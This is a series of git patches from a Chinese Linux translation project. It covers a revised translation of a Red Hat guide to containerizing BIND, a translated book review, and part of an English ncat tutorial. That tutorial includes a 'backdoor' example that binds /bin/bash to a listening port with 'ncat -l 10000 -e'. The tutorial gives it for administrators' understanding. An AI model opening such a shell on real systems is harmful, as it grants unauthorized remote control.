作为其初始化系统。我们可以如我们在典型的系统中做的那样安装并激活 BIND。你可以从 [git 仓库中下载这份 Dockerfile][8]。 ``` [root@rhel7-host bind]# vi Dockerfile @@ -29,19 +36,17 @@ EXPOSE 53/udp CMD [ "/sbin/init" ] ``` -因为我们以 PID 1 来启动一个 init 系统,当我们告诉容器停止时,需要改变 docker CLI 发送的信号。从 `kill` 系统调用手册中(man 2 kill): +因为我们以 PID 1 来启动一个初始化系统,当我们告诉容器停止时,需要改变 docker CLI 发送的信号。从 `kill` 系统调用手册中 (`man 2 kill`): -``` -The only signals that can be sent to process ID 1, the init -process, are those for which init has explicitly installed -signal handlers. This is done to assure the system is not -brought down accidentally. -``` +> 唯一可以发送给 PID 1 进程(即 init 进程)的信号,是那些初始化系统明确安装了信号处理器signal handler的信号。这是为了避免系统被意外破坏。 -对于 systemd 信号句柄,`SIGRTMIN+3`是对应于 `systemd start halt.target` 的信号。我们也应该暴露 TCP 和 UDP 端口号用来 BIND ,因为这两种协议可能都在使用中。 -## **管理数据** -有了一个实用的 BIND 服务,我们需要一种管理配置和区域文件的方法。目前这些都在容器里面,所以我们任何时候都可以进入容器去更新配置或者改变一个区域文件。从管理者角度来说,这并不是很理想。当要更新 BIND 时,我们将需要重建这个容器,所以映像中的改变将会丢失。任何时候我们需要更新一个文件或者重启服务时,都需要进入这个容器,而这增加了步骤和时间。 -相反的,我们将从这个容器中提取配置和数据文件,把它们拷贝到主机,然后在运行的时候挂载它们。这种方式我们可以很容易地重启或者重建容器,而不会丢失做出的更改。我们也可以使用容器外的编辑器来更改配置和区域文件。因为这个容器的数据看起来像“该系统服务的特定站点数据”,让我们遵循文件系统层次并在当前主机上创建 `/srv/named` 目录来保持管理权分离。 +对于 systemd 信号处理器,`SIGRTMIN+3` 是对应于 `systemd start halt.target` 的信号。我们也需要为 BIND 暴露 TCP 和 UDP 端口号,因为这两种协议可能都要使用。 + +### 管理数据 + +有了一个可以工作的 BIND 服务,我们还需要一种管理配置文件和区域文件的方法。目前这些都放在容器里面,所以我们任何时候都可以进入容器去更新配置或者改变一个区域文件。从管理的角度来说,这并不是很理想。当要更新 BIND 时,我们将需要重建这个容器,所以镜像中的改变将会丢失。任何时候我们需要更新一个文件或者重启服务时,都需要进入这个容器,而这增加了步骤和时间。 + +相反的,我们将从这个容器中提取出配置文件和数据文件,把它们拷贝到主机上,然后在运行的时候挂载它们。用这种方式我们可以很容易地重启或者重建容器,而不会丢失所做出的更改。我们也可以使用容器外的编辑器来更改配置和区域文件。因为这个容器的数据看起来像“该系统所提供服务的特定站点数据”,让我们遵循 Linux 文件系统层次标准File System Hierarchy,并在当前主机上创建 `/srv/named` 目录来保持管理权分离。 ``` [root@rhel7-host ~]# mkdir -p /srv/named/etc @@ -49,8 +54,9 @@ brought down accidentally. [root@rhel7-host ~]# mkdir -p /srv/named/var/named ``` - ***提示:如果你正在迁移一个存在的配置文件,你可以跳过下面的步骤并且将它直接拷贝到 `/srv/named` 目录下。你可能仍然想检查以一个临时容器分配给这个容器的 GID。*** -让我们建立并运行一个临时容器来检查 BIND。在将 init 进程作为 PID 1 运行时,我们不能交互地运行这个容器来获取一个 shell。我们会在容器 启动后执行 shell,并且使用 `rpm` 命令来检查重要文件。 +*提示:如果你正在迁移一个已有的配置文件,你可以跳过下面的步骤并且将它直接拷贝到 `/srv/named` 目录下。你也许仍然要用一个临时容器来检查一下分配给这个容器的 GID。* + +让我们建立并运行一个临时容器来检查 BIND。在将 init 进程以 PID 1 运行时,我们不能交互地运行这个容器来获取一个 shell。我们会在容器启动后执行 shell,并且使用 `rpm` 命令来检查重要文件。 ``` [root@rhel7-host ~]# docker build -t named . @@ -60,8 +66,9 @@ brought down accidentally. [root@0e77ce00405e /]# rpm -ql bind ``` -对于这个例子来说,我们将需要 `/etc/named.conf` 和 `/var/named/` 目录下的任何文件。我们可以使用 `machinectl` 命令来提取它们。如果有一个以上的容器注册了,我们可以使用 `machinectl status` 命令来查看任一机器上运行的是什么。一旦有了这个配置我们就可以终止这个临时容器了。 -*如果你喜欢,资源库中也有一个[样例 `named.conf` 和针对 `example.com` 的区域文件](http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo)* +对于这个例子来说,我们将需要 `/etc/named.conf` 和 `/var/named/` 目录下的任何文件。我们可以使用 `machinectl` 命令来提取它们。如果注册了一个以上的容器,我们可以在任一机器上使用 `machinectl status` 命令来查看运行的是什么。一旦有了这些配置,我们就可以终止这个临时容器了。 + +*如果你喜欢,资源库中也有一个[样例 `named.conf` 和针对 `example.com` 的区域文件][8]。* ``` [root@rhel7-host bind]# machinectl list @@ -76,17 +83,20 @@ MACHINE CLASS SERVICE [root@rhel7-host ~]# docker stop infallible_wescoff ``` -## **最终的创建** -为了创建和运行最终的容器,添加卷选项到挂载: +### 最终的创建 + +为了创建和运行最终的容器,添加卷选项以挂载: + - 将文件 `/srv/named/etc/named.conf` 映射为 `/etc/named.conf` - 将目录 `/srv/named/var/named` 映射为 `/var/named` -因为这是我们最终的容器,我们将提供一个有意义的名字,以供我们以后引用。 +因为这是我们最终的容器,我们将提供一个有意义的名字,以供我们以后引用。 + ``` [root@rhel7-host ~]# docker run -d -p 53:53 -p 53:53/udp -v /srv/named/etc/named.conf:/etc/named.conf:Z -v /srv/named/var/named:/var/named:Z --name named-container named -``` +``` -在最终容器运行时,我们可以更改本机配置来改变这个容器中 BIND 的行为。这个 BIND 服务器将需要在这个容器分配的任何 IP 上监听。确保任何新文件的 GID 与来自这个容器中的剩余 BIND 文件相匹配。 +在最终容器运行时,我们可以更改本机配置来改变这个容器中 BIND 的行为。这个 BIND 服务器将需要在这个容器分配的任何 IP 上监听。请确保任何新文件的 GID 与来自这个容器中的其余的 BIND 文件相匹配。 ``` [root@rhel7-host bind]# cp named.conf /srv/named/etc/named.conf @@ -94,10 +104,12 @@ MACHINE CLASS SERVICE [root@rhel7-host ~]# cp example.com.zone /srv/named/var/named/example.com.zone [root@rhel7-host ~]# cp example.com.rr.zone /srv/named/var/named/example.com.rr.zone -``` -> [很好奇为什么我不需要在主机目录中改变 SELinux 上下文?](http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_1) +``` + +> 很好奇为什么我不需要在主机目录中改变 SELinux 上下文?^注1 + +我们将运行这个容器提供的 `rndc` 二进制文件重新加载配置。我们可以使用 `journald` 以同样的方式检查 BIND 日志。如果运行出现错误,你可以在主机中编辑该文件,并且重新加载配置。在主机中使用 `host` 或 `dig`,我们可以检查来自该容器化服务的 example.com 的响应。 -我们将运行这个容器提供的 `rndc` 二进制文件重新加载配置。我们可以使用 `journald` 以同样的方式检查 BIND 日志。如果运行出现错误,你可以在主机中编辑这个文件,并且重新加载配置。在主机中使用 `host` 或 `dig`, 我们可以检查来自针对 example.com 而包含的服务的响应。 ``` [root@rhel7-host ~]# docker exec -it named-container rndc reload server reload successful @@ -122,81 +134,86 @@ Address: ::1#53 Aliases: www.example.com is an alias for server1.example.com. server1.example.com is an alias for mail -``` -> [你的区域文件没有更新吗?可能是因为你的编辑器,而不是序列号。](http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_2) +``` -## **终点线** +> 你的区域文件没有更新吗?可能是因为你的编辑器,而不是序列号。^注2 -我们已经知道我们打算完成什么。从容器中为 DNS 请求和区域文件提供服务。更新之后,我们已经得到一个持久化的位置来管理更新和配置。 -在这个系列的第二部分,我们将看到怎样将一个容器看作为主机中的一个普通服务。 +### 终点线 + +我们已经达成了我们打算完成的目标,从容器中为 DNS 请求和区域文件提供服务。我们已经得到一个持久化的位置来管理更新和配置,并且更新后该配置不变。 + +在这个系列的第二部分,我们将看到怎样将一个容器看作为主机中的一个普通服务来运行。 --- -[跟随 RHEL 博客](http://redhatstackblog.wordpress.com/feed/)通过电子邮件来获得本系列第二部分和其它新文章的更新。 +[关注 RHEL 博客](http://redhatstackblog.wordpress.com/feed/),通过电子邮件来获得本系列第二部分和其它新文章的更新。 --- -## **额外的资源** -**附带文件的 Github 仓库:**[**https://github.com/nzwulfin/named-container**](https://github.com/nzwulfin/named-container) -**侧边栏 1:** **通过容器访问本地文件的 SELinux 上下文** -你可能已经注意到当我从容器向本地主机拷贝文件时,我没有运行 `chcon` 将主机中的文件类型改变为 `svirt_sandbox_file_t`。为什么它没有终止?将一个文件拷贝到 `/srv` 本应该将这个文件标记为类型 `var_t`。我 `setenforce 0` 了吗? -当然没有,这将让 Dan Walsh 大哭(译注:未知人名)。是的,`machinectl` 确实将文件标记类型设置为期望的那样,可以看一下: -启动一个容器之前: -``` +### 附加资源 + +- **所附带文件的 Github 仓库:** [https://github.com/nzwulfin/named-container](https://github.com/nzwulfin/named-container) +- **注1:** **通过容器访问本地文件的 SELinux 上下文** + + 你可能已经注意到当我从容器向本地主机拷贝文件时,我没有运行 `chcon` 将主机中的文件类型改变为 `svirt_sandbox_file_t`。为什么它没有出错?将一个文件拷贝到 `/srv` 会将这个文件标记为类型 `var_t`。我 `setenforce 0` (关闭 SELinux)了吗? + + 当然没有,这将让 [Dan Walsh 大哭](https://stopdisablingselinux.com/)(LCTT 译注:RedHat 的 SELinux 团队负责人,倡议不要禁用 SELinux)。是的,`machinectl` 确实将文件标记类型设置为期望的那样,可以看一下: + + 启动一个容器之前: + + ``` [root@rhel7-host ~]# ls -Z /srv/named/etc/named.conf - -rw-r-----. unconfined_u:object_r:var_t:s0 /srv/named/etc/named.conf -``` - -After starting the container: -不,运行中我使用了一个卷选项使 Dan Walsh 高兴,`:Z`。`-v /srv/named/etc/named.conf:/etc/named.conf:Z`命令的这部分做了两件事情:首先它表示这需要使用一个私有的卷 SELiunx 标记来重新标记,其次它表明以读写挂载。 -启动容器之后: ``` + + 不过,运行中我使用了一个卷选项可以使 Dan Walsh 先生高兴起来,`:Z`。`-v /srv/named/etc/named.conf:/etc/named.conf:Z` 命令的这部分做了两件事情:首先它表示这需要使用一个私有卷的 SELiunx 标记来重新标记;其次它表明以读写挂载。 + + 启动容器之后: + + ``` [root@rhel7-host ~]# ls -Z /srv/named/etc/named.conf - -rw-r-----. root 25 system_u:object_r:svirt_sandbox_file_t:s0:c821,c956 /srv/named/etc/named.conf -``` - -**侧边栏 2:** **VIM 备份行为改变 inode** -如果你在本地主机中使用 `vim` 来编辑配置文件,并且你没有看到容器中的改变,你可能不经意的创建了容器感知不到的新文件。在编辑中时,有三种 `vim` 设定影响背负副本:backup, writebackup 和 backupcopy。 -我从官方 VIM backup_table 中剪下了应用到 RHEL 7 中的默认配置 -[[http://vimdoc.sourceforge.net/htmldoc/editing.html#backup-table](http://vimdoc.sourceforge.net/htmldoc/editing.html#backup-table)] ``` -backup writebackup +- **注2:** **VIM 备份行为能改变 inode** + + 如果你在本地主机中使用 `vim` 来编辑配置文件,而你没有看到容器中的改变,你可能不经意的创建了容器感知不到的新文件。在编辑时,有三种 `vim` 设定影响备份副本:`backup`、`writebackup` 和 `backupcopy`。 + + 我摘录了 RHEL 7 中的来自官方 VIM [backup_table][9] 中的默认配置。 + + ``` +backup writebackup off on backup current file, deleted afterwards (default) ``` -So we don’t create tilde copies that stick around, but we are creating backups. The other setting is backupcopy, where auto is the shipped default: -所以我们不创建停留的副本,但我们将创建备份。另外的设定是 backupcopy,`auto` 是默认的设置: -``` -"yes" make a copy of the file and overwrite the original one + 所以我们不创建残留下的 `~` 副本,而是创建备份。另外的设定是 `backupcopy`,`auto` 是默认的设置: + + ``` + "yes" make a copy of the file and overwrite the original one "no" rename the file and write a new one "auto" one of the previous, what works best ``` -这种组合设定意味着当你编辑一个文件时,除非 `vim` 有理由不去(检查文件逻辑),你将会得到包含你编辑之后的新文件,当你保存时它会重命名原先的文件。这意味着这个文件获得了新的 inode。对于大多数情况,这不是问题,但是这里绑定挂载到一个容器对 inode 的改变很敏感。为了解决这个问题,你需要改变 backupcopy 的行为。 -Either in the vim session or in your .vimrc, add set backupcopy=yes. This will make sure the original file gets truncated and overwritten, preserving the inode and propagating the changes into the container. -不管是在 `vim` 会话还是在你的 `.vimrc`中,添加 `set backupcopy=yes`。这将确保原先的文件被截断并且被覆写,维持了 inode 并且在容器中产生了改变。 + 这种组合设定意味着当你编辑一个文件时,除非 `vim` 有理由(请查看文档了解其逻辑),你将会得到一个包含你编辑内容的新文件,当你保存时它会重命名为原先的文件。这意味着这个文件获得了新的 inode。对于大多数情况,这不是问题,但是这里容器的绑定挂载bind mount对 inode 的改变很敏感。为了解决这个问题,你需要改变 `backupcopy` 的行为。 + + 不管是在 `vim` 会话中还是在你的 `.vimrc`中,请添加 `set backupcopy=yes`。这将确保原先的文件被清空并覆写,维持了 inode 不变并且将该改变传递到了容器中。 ------------ via: http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/ -作者:[Matt Micene ][a] +作者:[Matt Micene][a] 译者:[liuxinyu123](https://github.com/liuxinyu123) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - - - - - - - - - - - - +[a]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/ +[1]:http://rhelblog.redhat.com/author/mmicenerht/ +[2]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo +[3]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_1 +[4]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_2 +[5]:http://redhatstackblog.wordpress.com/feed/ +[6]:https://access.redhat.com/containers +[7]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo +[8]:https://github.com/nzwulfin/named-container +[9]:http://vimdoc.sourceforge.net/htmldoc/editing.html#backup-table \ No newline at end of file From 2e1505297c29af94b555133cc817b3d56cae7a6a Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 12 Dec 2017 12:03:48 +0800 Subject: [PATCH 0501/1627] =?UTF-8?q?PUB:20170719=20Containing=20System=20?= =?UTF-8?q?Services=20in=20Red=20Hat=20Enterprise=20Linux=20=E2=80=93=20Pa?= =?UTF-8?q?rt=201.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @liuxinyu123 文章发布地址:https://linux.cn/article-9135-1.html 你的 LCTT 专页地址:https://linux.cn/lctt/liuxinyu123 --- ...aining System Services in Red Hat Enterprise Linux – Part 1.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md (100%) diff --git a/translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md b/published/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md similarity index 100% rename from translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md rename to published/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md From 9a40287250406858cc22bbae9a414c7ae8cb62bf Mon Sep 17 00:00:00 2001 From: darsh8 <752458434@qq.com> Date: Tue, 12 Dec 2017 13:07:42 +0800 Subject: [PATCH 0502/1627] translated --- ...131 Book review Ours to Hack and to Own.md | 65 ------------------- ...131 Book review Ours to Hack and to Own.md | 63 ++++++++++++++++++ 2 files changed, 63 insertions(+), 65 deletions(-) delete mode 100644 sources/talk/20170131 Book review Ours to Hack and to Own.md create mode 100644 translated/20170131 Book review Ours to Hack and to Own.md diff --git a/sources/talk/20170131 Book review Ours to Hack and to Own.md b/sources/talk/20170131 Book review Ours to Hack and to Own.md deleted file mode 100644 index a75a39a718..0000000000 --- a/sources/talk/20170131 Book review Ours to Hack and to Own.md +++ /dev/null @@ -1,65 +0,0 @@ -darsh8 Translating - -Book review: Ours to Hack and to Own -============================================================ - - ![Book review: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDUCATION_colorbooks.png?itok=liB3FyjP "Book review: Ours to Hack and to Own") -Image by : opensource.com - -It seems like the age of ownership is over, and I'm not just talking about the devices and software that many of us bring into our homes and our lives. I'm also talking about the platforms and services on which those devices and apps rely. - -While many of the services that we use are free, we don't have any control over them. The firms that do, in essence, control what we see, what we hear, and what we read. Not only that, but many of them are also changing the nature of work. They're using closed platforms to power a shift away from full-time work to the [gig economy][2], one that offers little in the way of security or certainty. - -This move has wide-ranging implications for the Internet and for everyone who uses and relies on it. The vision of the open Internet from just 20-odd-years ago is fading and is rapidly being replaced by an impenetrable curtain. - -One remedy that's becoming popular is building [platform cooperatives][3], which are digital platforms that their users own. The idea behind platform cooperatives has many of the same roots as open source, as the book "[Ours to Hack and to Own][4]" explains. - -Scholar Trebor Scholz and writer Nathan Schneider have collected 40 essays discussing the rise of, and the need for, platform cooperatives as tools ordinary people can use to promote openness, and to counter the opaqueness and the restrictions of closed systems. - -### Where open source fits in - -At or near the core of any platform cooperative lies open source; not necessarily open source technologies, but the principles and the ethos that underlie open source—openness, transparency, cooperation, collaboration, and sharing. - -In his introduction to the book, Trebor Scholz points out that: - -> In opposition to the black-box systems of the Snowden-era Internet, these platforms need to distinguish themselves by making their data flows transparent. They need to show where the data about customers and workers are stored, to whom they are sold, and for what purpose. - -It's that transparency, so essential to open source, which helps make platform cooperatives so appealing and a refreshing change from much of what exists now. - -Open source software can definitely play a part in the vision of platform cooperatives that "Ours to Hack and to Own" shares. Open source software can provide a fast, inexpensive way for groups to build the technical infrastructure that can power their cooperatives. - -Mickey Metts illustrates this in the essay, "Meet Your Friendly Neighborhood Tech Co-Op." Metts works for a firm called Agaric, which uses Drupal to build for groups and small business what they otherwise couldn't do for themselves. On top of that, Metts encourages anyone wanting to build and run their own business or co-op to embrace free and open source software. Why? It's high quality, it's inexpensive, you can customize it, and you can connect with large communities of helpful, passionate people. - -### Not always about open source, but open source is always there - -Not all of the essays in this book focus or touch on open source; however, the key elements of the open source way—cooperation, community, open governance, and digital freedom—are always on or just below the surface. - -In fact, as many of the essays in "Ours to Hack and to Own" argue, platform cooperatives can be important building blocks of a more open, commons-based economy and society. That can be, in Douglas Rushkoff's words, organizations like Creative Commons compensating "for the privatization of shared intellectual resources." It can also be what Francesca Bria, Barcelona's CTO, describes as cities running their own "distributed common data infrastructures with systems that ensure the security and privacy and sovereignty of citizens' data." - -### Final thought - -If you're looking for a blueprint for changing the Internet and the way we work, "Ours to Hack and to Own" isn't it. The book is more a manifesto than user guide. Having said that, "Ours to Hack and to Own" offers a glimpse at what we can do if we apply the principles of the open source way to society and to the wider world. - --------------------------------------------------------------------------------- - -作者简介: - -Scott Nesbitt - Writer. Editor. Soldier of fortune. Ocelot wrangler. Husband and father. Blogger. Collector of pottery. Scott is a few of these things. He's also a long-time user of free/open source software who extensively writes and blogs about it. You can find Scott on Twitter, GitHub - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/review-book-ours-to-hack-and-own - -作者:[Scott Nesbitt][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/article/17/1/review-book-ours-to-hack-and-own?rate=dgkFEuCLLeutLMH2N_4TmUupAJDjgNvFpqWqYCbQb-8 -[2]:https://en.wikipedia.org/wiki/Access_economy -[3]:https://en.wikipedia.org/wiki/Platform_cooperative -[4]:http://www.orbooks.com/catalog/ours-to-hack-and-to-own/ -[5]:https://opensource.com/user/14925/feed -[6]:https://opensource.com/users/scottnesbitt diff --git a/translated/20170131 Book review Ours to Hack and to Own.md b/translated/20170131 Book review Ours to Hack and to Own.md new file mode 100644 index 0000000000..1948ea4ab9 --- /dev/null +++ b/translated/20170131 Book review Ours to Hack and to Own.md @@ -0,0 +1,63 @@ +书评:《Ours to Hack and to Own》 +============================================================ + + ![书评: Ours to Hack and to Own](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDUCATION_colorbooks.png?itok=liB3FyjP "Book review: Ours to Hack and to Own") +Image by : opensource.com + +私有制的时代看起来似乎结束了,我将不仅仅讨论那些由我们中的许多人引入到我们的家庭与生活的设备和软件。我也将讨论这些设备与应用依赖的平台与服务。 + +尽管我们使用的许多服务是免费的,我们对它们并没有任何控制。本质上讲,这些企业确实控制着我们所看到的,听到的以及阅读到的内容。不仅如此,许多企业还在改变工作的性质。他们正使用封闭的平台来助长由全职工作到[零工经济][2]的转变方式,这种方式提供极少的安全性与确定性。 + +这项行动对于网络以及每一个使用与依赖网络的人产生了广泛的影响。仅仅二十多年前的开放网络的想象正在逐渐消逝并迅速地被一块难以穿透的幕帘所取代。 + +一种变得流行的补救办法就是建立[平台合作][3], 由他们的用户所拥有的电子化平台。正如这本书所阐述的,平台合作社背后的观点与开源有许多相同的根源。 + +学者Trebor Scholz和作家Nathan Schneider已经收集了40篇探讨平台合作社作为普通人可使用以提升开放性并对闭源系统的不透明性及各种限制予以还击的工具的增长及需求的论文。 + +### 哪里适合开源 + +任何平台合作社核心及接近核心的部分依赖与开源;不仅开源技术是必要的,构成开源开放性,透明性,协同合作以及共享的准则与理念同样不可或缺。 + +在这本书的介绍中, Trebor Scholz指出: + +> 与网络的黑盒子系统相反,这些平台需要使它们的数据流透明来辨别自身。他们需要展示客户与员工的数据在哪里存储,数据出售给了谁以及数据为了何种目的。 + +正是对开源如此重要的透明性,促使平台合作社如此吸引人并在目前大量已存平台之中成为令人耳目一新的变化。 + +开源软件在《Ours to Hack and to Own》所分享的平台合作社的构想中必然充当着重要角色。开源软件能够为群体建立助推合作社的技术型公共建设提供快速,不算昂贵的途径。 + +Mickey Metts在论文中这样形容, "与你的友好的社区型技术合作社相遇。(原文:Meet Your Friendly Neighborhood Tech Co-Op.)" Metts为一家名为Agaric的企业工作,这家企业使用Drupal为团体及小型企业建立他们不能独自完成的产品。除此以外, Metts还鼓励任何想要建立并运营自己的企业的公司或合作社的人接受免费且开源的软件。为什么呢?因为它是高质量的,不算昂贵的,可定制的,并且你能够与由乐于助人而又热情的人们组成的大型社区产生联系。 + +### 不总是开源的,但开源总在 + +这本书里不是所有的论文都聚焦或提及开源的;但是,开源方式的关键元素-合作,社区,开放管理以及电子自由化-总是在其表面若隐若现。 + +事实上正如《Ours to Hack and to Own》中许多论文所讨论的,建立一个更加开放,基于平常人的经济与社会区块,平台合作社会变得非常重要。用Douglas Rushkoff的话讲,那会是类似Creative Commons的组织“对共享知识资源的私有化”的补偿。它们也如Barcelona的CTO(首席执行官)Francesca Bria所描述的那样,是“通过确保市民数据安全性,隐私性和权利的系统”来运营他们自己的“分布式通用数据基础架构”的城市。 + +### 最后的思考 + +如果你在寻找改变互联网的蓝图以及我们工作的方式,《Ours to Hack and to Own》并不是你要寻找的。这本书与其说是用户指南,不如说是一种宣言。如书中所说,《Ours to Hack and to Own》让我们略微了解如果我们将开源方式准则应用于社会及更加广泛的世界我们能够做的事。 + +-------------------------------------------------------------------------------- + +作者简介: + +Scott Nesbitt -作家,编辑,雇佣兵,虎猫牛仔(原文:Ocelot wrangle),丈夫与父亲,博客写手,陶器收藏家。Scott正是做这样的一些事情。他还是大量写关于开源软件文章与博客的长期开源用户。你可以在Twitter,Github上找到他。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/review-book-ours-to-hack-and-own + +作者:[Scott Nesbitt][a] +译者:[darsh8](https://github.com/darsh8) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/article/17/1/review-book-ours-to-hack-and-own?rate=dgkFEuCLLeutLMH2N_4TmUupAJDjgNvFpqWqYCbQb-8 +[2]:https://en.wikipedia.org/wiki/Access_economy +[3]:https://en.wikipedia.org/wiki/Platform_cooperative +[4]:http://www.orbooks.com/catalog/ours-to-hack-and-to-own/ +[5]:https://opensource.com/user/14925/feed +[6]:https://opensource.com/users/scottnesbitt From 6afe8d9765092b483859541ddf600637b96c2869 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 14:32:10 +0800 Subject: [PATCH 0503/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...(nc) Command Examples for Linux Systems.md | 200 ------------------ ...(nc) Command Examples for Linux Systems.md | 199 +++++++++++++++++ 2 files changed, 199 insertions(+), 200 deletions(-) delete mode 100644 sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md create mode 100644 translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md diff --git a/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md b/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md deleted file mode 100644 index 8264014664..0000000000 --- a/sources/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md +++ /dev/null @@ -1,200 +0,0 @@ -translating by lujun9972 -10 useful ncat (nc) Command Examples for Linux Systems -====== - [![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1] - -ncat or nc is networking utility with functionality similar to cat command but for network. It is a general purpose CLI tool for reading, writing, redirecting data across a network. It is designed to be a reliable back-end tool that can be used with scripts or other programs. It’s also a great tool for network debugging, as it can create any kind of connect one can need. - -ncat/nc can be a port scanning tool, or a security tool, or monitoring tool and is also a simple TCP proxy. Since it has so many features, it is known as a network swiss army knife. It’s one of those tools that every System Admin should know & master. - -In most of Debian distributions ‘nc’ is available and its package is automatically installed during installation. But in minimal CentOS 7 / RHEL 7 installation you will not find nc as a default package. You need to install using the following command. - -``` -[root@linuxtechi ~]# yum install nmap-ncat -y -``` - -System admins can use it audit their system security, they can use it find the ports that are opened & than secure them. Admins can also use it as a client for auditing web servers, telnet servers, mail servers etc, with ‘nc’ we can control every character sent & can also view the responses to sent queries. - -We can also cause it to capture data being sent by client to understand what they are upto. - -In this tutorial, we are going to learn about how to use ‘nc’ command with 10 examples, - -#### Example: 1) Listen to inbound connections - -Ncat can work in listen mode & we can listen for inbound connections on port number with option ‘l’. Complete command is, - -$ ncat -l port_number - -For example, - -``` -$ ncat -l 8080 -``` - -Server will now start listening to port 8080 for inbound connections. - -#### Example: 2) Connect to a remote system - -To connect to a remote system with nc, we can use the following command, - -$ ncat IP_address port_number - -Let’s take an example, - -``` -$ ncat 192.168.1.100 80 -``` - -Now a connection to server with IP address 192.168.1.100 will be made at port 80 & we can now send instructions to server. Like we can get the complete page content with - -GET / HTTP/1.1 - -or get the page name, - -GET / HTTP/1.1 - -or we can get banner for OS fingerprinting with the following, - -HEAD / HTTP/1.1 - -This will tell what software is being used to run the web Server. - -#### Example: 3) Connecting to UDP ports - -By default , the nc utility makes connections only to TCP ports. But we can also make connections to UDP ports, for that we can use option ‘u’, - -``` -$ ncat -l -u 1234 -``` - -Now our system will start listening a udp port ‘1234’, we can verify this using below netstat command, - -``` -$ netstat -tunlp | grep 1234 -udp 0 0 0.0.0.0:1234 0.0.0.0:* 17341/nc -udp6 0 0 :::1234 :::* 17341/nc -``` - -Let’s assume we want to send or test UDP port connectivity to a specific remote host, then use the following command, - -$ ncat -v -u {host-ip} {udp-port} - -example: - -``` -[root@localhost ~]# ncat -v -u 192.168.105.150 53 -Ncat: Version 6.40 ( http://nmap.org/ncat ) -Ncat: Connected to 192.168.105.150:53. -``` - -#### Example: 4) NC as chat tool - -NC can also be used as chat tool, we can configure server to listen to a port & than can make connection to server from a remote machine on same port & start sending message. On server side, run - -``` -$ ncat -l 8080 -``` - -On remote client machine, run - -``` -$ ncat 192.168.1.100 8080 -``` - -Than start sending messages & they will be displayed on server terminal. - -#### Example: 5) NC as a proxy - -NC can also be used as a proxy with a simple command. Let’s take an example, - -``` -$ ncat -l 8080 | ncat 192.168.1.200 80 -``` - -Now all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80\. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so, - -``` -$ mkfifo 2way -$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way -``` - -Now you will be able to send & receive data over nc proxy. - -#### Example: 6) Copying Files using nc/ncat - -NC can also be used to copy the files from one system to another, though it is not recommended & mostly all systems have ssh/scp installed by default. But none the less if you have come across a system with no ssh/scp, you can also use nc as last ditch effort. - -Start with machine on which data is to be received & start nc is listener mode, - -``` -$ ncat -l 8080 > file.txt -``` - -Now on the machine from where data is to be copied, run the following command, - -``` -$ ncat 192.168.1.100 8080 --send-only < data.txt -``` - -Here, data.txt is the file that has to be sent. –send-only option will close the connection once the file has been copied. If not using this option, than we will have press ctrl+c to close the connection manually. - -We can also copy entire disk partitions using this method, but it should be done with caution. - -#### Example: 7) Create a backdoor via nc/nact - -NC command can also be used to create backdoor to your systems & this technique is actually used by hackers a lot. We should know how it works in order to secure our system. To create a backdoor, the command is, - -``` -$ ncat -l 10000 -e /bin/bash -``` - -‘e‘ flag attaches a bash to port 10000\. Now a client can connect to port 10000 on server & will have complete access to our system via bash, - -``` -$ ncat 192.168.1.100 1000 -``` - -#### Example: 8) Port forwarding via nc/ncat - -We can also use NC for port forwarding with the help of option ‘c’ , syntax for accomplishing port forwarding is, - 